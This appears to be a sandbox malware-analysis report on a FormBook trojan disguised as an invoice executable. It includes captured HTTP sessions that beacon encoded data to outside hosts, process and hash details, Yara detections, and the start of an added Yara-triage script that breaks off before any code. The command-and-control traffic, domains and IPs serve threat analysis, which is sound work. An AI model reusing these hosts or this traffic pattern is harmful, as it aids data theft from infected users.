Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
Data Ascii: BHNhDJjp= [TRUNCATED]
Oct 11, 2024 15:11:10.653997898 CEST | 533 | IN | HTTP/1.1 404 Not Found
Date: Fri, 11 Oct 2024 13:11:10 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.5 | 50013 | 162.0.225.218 | 80 | 3224 | C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 15:11:12.537889957 CEST | 552 | OUT | GET /ksch/?BHNhDJjp=J8lzQYDSDIyYjxmyisycdc0dQo+0mdR+IGXfAda7tEE7fn+2GVkWw6+hdf3A0BNElIx5K3urdoerlkCH3feHlz5JfFADuLqaJ1HoxSfDOrbKFf5fEpK5Atk4IzSpx3Ij7g==&KteDo=fX0Hm8kxa HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Host: www.supox.site
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
Oct 11, 2024 15:11:13.124404907 CEST | 548 | IN | HTTP/1.1 404 Not Found
Date: Fri, 11 Oct 2024 13:11:13 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html; charset=utf-8
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.5 | 50014 | 103.249.106.91 | 80 | 3224 | C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 15:11:18.270160913 CEST | 807 | OUT | POST /886f/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.5711337.xyz
Origin: http://www.5711337.xyz
Referer: http://www.5711337.xyz/886f/
Content-Length: 209
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
Data Ascii: BHNhDJjp=I6+9XpOqUzkRUo6djTORuj7/N4UimWCIr7wLCz1UcG1jztAiiL6LPoRkWJDJzRHZaYKx/xOHuXod4OM1O51iNtHUbbeQrQ9z2S1CYB8+Ps+rpbZiK0P/nvJ3vgG9dzwjKjY0p/FMuNmUwIbdvG4rsAZds8vBtqr+joMX5gMZdfrOxUbKTVo7qsusJYsvGK97MNYu6CY=
Oct 11, 2024 15:11:19.130822897 CEST | 190 | IN | HTTP/1.1 400 Bad Request
Server: nginx
Date: Fri, 11 Oct 2024 13:11:18 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
Data Ascii: d404 Not Found0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.5 | 50015 | 103.249.106.91 | 80 | 3224 | C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe

Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 15:11:20.914417982 CEST | 827 | OUT | POST /886f/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    Host: www.5711337.xyz
    Origin: http://www.5711337.xyz
    Referer: http://www.5711337.xyz/886f/
    Content-Length: 229
    Content-Type: application/x-www-form-urlencoded
    Cache-Control: no-cache
    Connection: close
    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
    Data Raw: 42 48 4e 68 44 4a 6a 70 3d 49 36 2b 39 58 70 4f 71 55 7a 6b 52 53 35 71 64 67 30 69 52 36 7a 37 38 42 59 55 69 76 32 43 4d 72 37 38 4c 43 79 41 66 63 55 42 6a 7a 4e 51 69 6c 49 69 4c 49 6f 52 6b 44 35 44 4d 39 78 47 30 61 66 43 44 2f 30 75 48 75 54 49 64 34 4f 63 31 4f 49 31 6a 4d 39 48 57 55 37 65 6f 32 67 39 7a 32 53 31 43 59 41 4d 59 50 73 6d 72 70 72 70 69 4c 57 6e 34 35 2f 4a 6f 6d 41 47 39 57 54 77 6e 4b 6a 59 61 70 2b 70 6d 75 50 75 55 77 4e 2f 64 76 53 6b 6b 31 77 5a 48 6a 63 75 6c 6b 72 36 74 72 61 41 63 7a 32 5a 43 4a 73 6e 4e 39 43 32 67 4a 33 67 54 35 4d 43 55 5a 4c 6b 59 58 36 63 53 57 75 49 65 6b 56 4d 36 6e 67 63 79 51 67 54 6b 6e 76 63 45 41 62 61 52 6b 6d 74 77
    Data Ascii: BHNhDJjp=I6+9XpOqUzkRS5qdg0iR6z78BYUiv2CMr78LCyAfcUBjzNQilIiLIoRkD5DM9xG0afCD/0uHuTId4Oc1OI1jM9HWU7eo2g9z2S1CYAMYPsmrprpiLWn45/JomAG9WTwnKjYap+pmuPuUwN/dvSkk1wZHjculkr6traAcz2ZCJsnN9C2gJ3gT5MCUZLkYX6cSWuIekVM6ngcyQgTknvcEAbaRkmtw
Oct 11, 2024 15:11:21.725495100 CEST | 190 | IN | HTTP/1.1 400 Bad Request
    Server: nginx
    Date: Fri, 11 Oct 2024 13:11:21 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
    Data Ascii: d404 Not Found0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.5 | 50016 | 103.249.106.91 | 80 | 3224 | C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe

Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 15:11:23.558125973 CEST | 1844 | OUT | POST /886f/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    Host: www.5711337.xyz
    Origin: http://www.5711337.xyz
    Referer: http://www.5711337.xyz/886f/
    Content-Length: 1245
    Content-Type: application/x-www-form-urlencoded
    Cache-Control: no-cache
    Connection: close
    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
    Data Raw: 42 48 4e 68 44 4a 6a 70 3d 49 36 2b 39 58 70 4f 71 55 7a 6b 52 53 35 71 64 67 30 69 52 36 7a 37 38 42 59 55 69 76 32 43 4d 72 37 38 4c 43 79 41 66 63 55 5a 6a 77 2b 6f 69 6c 70 69 4c 4a 6f 52 6b 66 70 44 4e 39 78 47 4d 61 65 6d 48 2f 30 71 58 75 56 45 64 34 74 45 31 49 37 74 6a 46 39 48 57 57 37 65 54 72 51 39 6d 32 53 6c 65 59 42 77 59 50 73 6d 72 70 70 68 69 43 6b 50 34 37 2f 4a 33 76 67 47 4c 64 7a 78 43 4b 6e 30 73 70 2b 73 54 75 65 4f 55 7a 74 50 64 74 6e 34 6b 71 41 5a 42 67 63 75 39 6b 72 33 31 72 61 63 2b 7a 32 46 73 4a 73 76 4e 2f 32 7a 32 53 6d 6f 5a 6e 4b 44 32 54 5a 59 34 44 75 51 76 65 73 41 69 6e 57 59 76 34 53 4a 64 66 6d 54 66 79 76 4a 4c 62 75 65 73 68 68 4a 34 42 49 39 56 57 2f 64 2f 33 4f 77 2f 44 6e 71 6d 63 31 7a 69 50 4e 49 56 35 71 64 4b 47 74 6b 2b 59 4d 4c 77 67 42 78 6e 43 79 69 65 35 53 4e 61 64 5a 41 2f 32 6a 2b 4b 74 6a 47 36 2f 6f 78 67 49 4b 6b 68 35 6f 32 43 39 47 49 2f 4f 74 54 30 51 48 4e 68 4d 35 32 63 4b 33 37 61 71 58 4c 4e 58 36 72 39 52 6d 7a 58 64 4f 6f 78 59 [TRUNCATED]
    Data Ascii: BHNhDJjp= [TRUNCATED]
Oct 11, 2024 15:11:24.405448914 CEST | 190 | IN | HTTP/1.1 400 Bad Request
    Server: nginx
    Date: Fri, 11 Oct 2024 13:11:24 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
    Data Ascii: d404 Not Found0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.5 | 50017 | 103.249.106.91 | 80 | 3224 | C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe

Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 15:11:26.333060026 CEST | 553 | OUT | GET /886f/?KteDo=fX0Hm8kxa&BHNhDJjp=F4WdUfqIHBg/HL3skErP7lPVDvUzs0Cr8ZA+Fg9dI3ceouFLqqnQf6dPVZvR/nKMPYrd+0qk5jIF7ORmEYYYOZXDdPSYgHhA7DdWNhIxJ8KzsbpvOzugz6Mfni67awxMIw== HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.9
    Host: www.5711337.xyz
    Connection: close
    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
Oct 11, 2024 15:11:27.797785997 CEST | 1236 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 11 Oct 2024 13:11:27 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    Data Raw: 62 35 37 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6d 69 70 3d 22 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 69 63 61 62 6c 65 2d 64 65 76 69 63 65 22 20 63 6f 6e 74 65 6e 74 3d 22 70 63 2c 6d 6f 62 69 6c 65 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4d 6f 62 69 6c 65 4f 70 74 69 6d 69 7a 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 48 61 6e 64 68 65 6c 64 46 72 69 65 6e 64 6c 79 22 20 63 6f 6e 74 65 6e 74 3d 22 74 72 75 65 22 20 2f 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 [TRUNCATED]
    Data Ascii: b577<!DOCTYPE html><html mip=""><head><meta charset="utf-8" /><meta name="applicable-device" content="pc,mobile" /><meta name="MobileOptimized" content="width" /><meta name="HandheldFriendly" content="true" /><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=0" /><link rel="shortcut icon" href="//www.5711337.xyz/favicon.ico" type="image/x-icon" /><title>&#22836;&#21495;&#21069;&#22971;_www68caocom&#21494;&#20521;&#24420;&#28139;&#33633;&#26377;&#22768;&#23567;&#35828;&#35841;&#26377;H&#21160;&#28459;&#22270;&#29255;&#32593;&#31449;&#19969;&#39321;&#21307;&#23398;&#32593;-&#20122;&#27954;&#32508;&#21512;&#20132;&#28165;&#22270;&#21306;</title><meta name="keywords" content="&#22836;&#21495;&#21069;&#22971;_www68caocom&#21494;&#20521;&#24420;&#28139;&#33633;&#26377;&#22768;&#23567;&#35828;&#35841;&#26377;H&#21160;&#28459;&#22270;&#29255;&#32593;&#31449;&#19969;&#39321;&#21307;&#23398;&#32593;" / [TRUNCATED]
Oct 11, 2024 15:11:27.797815084 CEST | 1236 | IN | Data Raw: 38 33 36 3b 26 23 32 31 34 39 35 3b 26 23 32 31 30 36 39 3b 26 23 32 32 39 37 31 3b e2 80 9d 26 23 32 36 31 35 39 3b 26 23 32 35 33 35 31 3b 26 23 31 39 39 36 38 3b 26 23 32 30 30 31 30 3b 26 23 32 32 38 39 39 3b 26 23 32 34 36 31 35 3b ef bc 8c
    Data Ascii: 836;&#21495;&#21069;&#22971;&#26159;&#25351;&#19968;&#20010;&#22899;&#24615;&#26366;&#32463;&#23233;&#32473;&#20102;&#19968;&#20301;&#38750;&#24120;&#25104;&#21151;&#30340;&#30007;&#24615;&#24182;&#22312;&#36825;&#27573;&#23130;&#2303
Oct 11, 2024 15:11:27.797837019 CEST | 1236 | IN | Data Raw: 39 39 36 38 3b 26 23 32 30 30 31 30 3b 26 23 32 32 38 39 39 3b 26 23 32 34 36 31 35 3b ef bc 8c 26 23 32 36 33 36 36 3b 26 23 33 32 34 36 33 3b 26 23 32 33 32 33 33 3b 26 23 33 32 34 37 33 3b 26 23 32 30 31 30 32 3b 26 23 31 39 39 36 38 3b 26 23
    Data Ascii: 9968;&#20010;&#22899;&#24615;&#26366;&#32463;&#23233;&#32473;&#20102;&#19968;&#20301;&#38750;&#24120;&#25104;&#21151;&#30340;&#30007;&#24615;&#24182;&#22312;&#36825;&#27573;&#23130;&#23035;&#20013;&#25198;&#28436;&#20102;&#37325;&#35201;
Oct 11, 2024 15:11:27.798520088 CEST | 672 | IN | Data Raw: 70 78 3b 7d 20 2e 68 65 61 66 65 72 79 73 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 33 33 33 33 33 33 3b 20 7d 20 2e 6e 61 76 20 6c 69 3a 68 6f 76 65 72 3e 61 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20
    Data Ascii: px;} .heaferys { background-color: #333333; } .nav li:hover>a { background-color: #838c92; } .nav li.active>a { background-color: #838c92; } .nav ul ul { background-color: #838c92; } .nav ul li:hover>ul { background-color: #838c92; } .nav ul u
Oct 11, 2024 15:11:27.798537970 CEST | 1236 | IN | Data Raw: 3a 20 23 66 66 36 36 30 30 3b 20 7d 20 2e 71 6b 5f 6f 6e 65 62 6f 78 5f 7a 68 6f 6e 67 5f 74 62 74 20 65 6d 20 68 31 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 34 34 34 34 34 34 3b 20 7d 20 2e 71 6b 5f 6f 6e 65 62 6f 78 5f 7a 68 6f 6e 67 5f
    Data Ascii: : #ff6600; } .qk_onebox_zhong_tbt em h1 { background: #444444; } .qk_onebox_zhong_tbt em h2 { color: #444444; } .qk_ibox3_z_btgg em { background: #444444; } .qk_ibox3_z_btgg p { color: #444444; } .hometab .title li.active a { color: #444444; }
Oct 11, 2024 15:11:27.799335957 CEST | 1236 | IN | Data Raw: 2e 6d 5f 6d 65 6e 75 20 75 6c 2e 6d 65 6e 75 20 6c 69 20 61 7b 63 6f 6c 6f 72 3a 23 39 39 39 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 3a 38 70 78 20 32 30 70 78 7d 20 2e 6d 5f 6d 65 6e 75 20 75 6c 2e 6d 65 6e 75 20 6c 69
    Data Ascii: .m_menu ul.menu li a{color:#999;display:block;padding:8px 20px} .m_menu ul.menu li .ul-subcates{display:block;margin-left:20px;border-top:1px rgba(255,255,255,0.1) solid} .m_menu ul.menu li .ul-subcates>li:first-child{border-top:0} .m_menu ul.
Oct 11, 2024 15:11:27.799354076 CEST | 1236 | IN | Data Raw: 2e 63 75 72 72 65 6e 74 2d 6d 65 6e 75 2d 69 74 65 6d 3e 61 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 20 2e 6d 5f 6d 65 6e 75 20 75 6c 2e 6d 65 6e 75 20 6c 69 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c
    Data Ascii: .current-menu-item>a{color:#fff} .m_menu ul.menu li:hover{background-color:rgba(0,0,0,0.2)} .m_menu ul.menu li:hover>a{color:#fff} .m_menu ul.menu li:hover>span.menu_btn:before,.m_menu ul.menu li:hover>span.menu_btn:after{color:#fff} .lightbox
Oct 11, 2024 15:11:27.800157070 CEST | 1236 | IN | Data Raw: 70 7a 6f 6e 65 3d 22 32 64 33 33 31 34 22 3e 3c 2f 62 64 6f 3e 3c 64 66 6e 20 64 61 74 65 2d 74 69 6d 65 3d 22 62 36 36 64 64 35 22 3e 3c 2f 64 66 6e 3e 3c 66 6f 6e 74 20 64 69 72 3d 22 30 66 35 65 37 35 22 3e 3c 2f 66 6f 6e 74 3e 3c 64 69 76 20
    Data Ascii: pzone="2d3314"></bdo><dfn date-time="b66dd5"></dfn><font dir="0f5e75"></font><div dropzone="17ad6a" id="monavber" class="e17ad6 nav heaferys" data-type="index" data-infoid=""><ins lang="5b5756"></ins><small draggable="79e894"></small><sup drop
Oct 11, 2024 15:11:27.800178051 CEST | 1236 | IN | Data Raw: 97 b4 e7 94 b1 e7 be 8e 22 20 74 69 74 6c 65 3d 22 e9 a3 8e e9 97 b4 e7 94 b1 e7 be 8e 22 3e e9 a3 8e e9 97 b4 e7 94 b1 e7 be 8e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 69 64 3d 22 6e 61 76 62 61 72 2d 63 61 74 65 67 6f 72 79 2d 32 22 3e 3c 61 20
    Data Ascii: " title=""></a></li><li id="navbar-category-2"><a href="http://www.5711337.xyz/gongdilan/" data-type="mip" data-title="" title=""></a></li><li id="navbar-category-2"><a href="http://ww
Oct 11, 2024 15:11:27.800194979 CEST | 1236 | IN | Data Raw: 30 22 3e 3c 2f 74 69 6d 65 3e 3c 64 69 76 20 64 72 61 67 67 61 62 6c 65 3d 22 64 30 61 62 36 34 22 20 63 6c 61 73 73 3d 22 6d 62 32 63 30 39 20 6c 75 6a 69 6e 67 32 32 22 3e 3c 74 74 20 6c 61 6e 67 3d 22 63 31 39 32 30 34 22 3e 3c 2f 74 74 3e 3c
    Data Ascii: 0"></time><div draggable="d0ab64" class="mb2c09 lujing22"><tt lang="c19204"></tt><var draggable="595b7a"></var><area dropzone="630d25"></area><div dropzone="7eb9dd" id="pt" class="n63709 bm cl"><map date-time="064f43"></map><bdo dir="fff0b4"><
Oct 11, 2024 15:11:27.803169012 CEST | 1236 | IN | Data Raw: 3c 2f 69 6e 73 3e 3c 73 6d 61 6c 6c 20 64 61 74 65 2d 74 69 6d 65 3d 22 33 30 63 37 38 31 22 3e 3c 2f 73 6d 61 6c 6c 3e 3c 64 69 76 20 64 69 72 3d 22 39 65 30 36 63 33 22 20 69 64 3d 22 6d 61 69 6e 22 3e 3c 73 75 70 20 64 69 72 3d 22 34 64 33 38
    Data Ascii: </ins><small date-time="30c781"></small><div dir="9e06c3" id="main"><sup dir="4d38b2"></sup><time lang="1d89d4"></time><tt draggable="23b8f1"></tt><div lang="b2c09f" class="q5fb16 main container"><var dropzone="165fe6"></var><area date-time="4


Target ID: 0
Start time: 09:08:22
Start date: 11/10/2024
Path: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\COMMERCIAL INVOICES.exe"
Imagebase: 0x6f0000
File size: 717'832 bytes
MD5 hash: 57CCF777596297F30D94BC1394D4B38F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 4
Start time: 09:08:56
Start date: 11/10/2024
Path: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\COMMERCIAL INVOICES.exe"
Imagebase: 0x770000
File size: 717'832 bytes
MD5 hash: 57CCF777596297F30D94BC1394D4B38F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2604198656.0000000005EF0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2604198656.0000000005EF0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2543824282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2543824282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2545033489.0000000003F40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2545033489.0000000003F40000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation: low
Has exited: true

Target ID: 5
Start time: 09:09:04
Start date: 11/10/2024
Path: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe"
Imagebase: 0x60000
File size: 140'800 bytes
MD5 hash: 32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3899241480.00000000056D0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3899241480.00000000056D0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation: high
Has exited: false

Target ID: 6
Start time: 09:09:06
Start date: 11/10/2024
Path: C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\SysWOW64\taskkill.exe"
Imagebase: 0x7ff6d64d0000
File size: 74'240 bytes
MD5 hash: CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3899277856.00000000048F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3899277856.00000000048F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3899336059.0000000004940000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3899336059.0000000004940000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3897564995.0000000000850000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3897564995.0000000000850000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation: high
Has exited: false

Target ID: 9
Start time: 09:09:19
Start date: 11/10/2024
Path: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe"
Imagebase: 0x60000
File size: 140'800 bytes
MD5 hash: 32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3898777340.0000000000CD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3898777340.0000000000CD0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation: high
Has exited: false

Target ID: 10
Start time: 09:09:31
Start date: 11/10/2024
Path: C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase: 0x7ff79f9e0000
File size: 676'768 bytes
MD5 hash: C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true
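The Yara hits above are reported against memory dump names, and the dump name itself tells an analyst which region to pull first: a FormBook signature inside executable memory that is not backed by an image section is the unpacked or injected payload, while a hit in a read/write region is usually data. The following Python is an added triage script, not part of the Joe Sandbox report; it parses a constructed subset of the "Yara matches" lines copied from the entries above. The field layout of the .sdmp name (target id, dump kind, dump id, base address, protection, flags, region type, reserved) and the use of winnt.h values for the protection and region-type fields are assumptions, not something the report documents.

```python
import re
from collections import defaultdict

# Constructed input: a subset of the "Yara matches" lines printed in the
# process entries of this report, copied verbatim (one hit per line).
REPORT_LINES = """\
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2604198656.0000000005EF0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2604198656.0000000005EF0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2543824282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2545033489.0000000003F40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3899241480.00000000056D0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3899277856.00000000048F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3899336059.0000000004940000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
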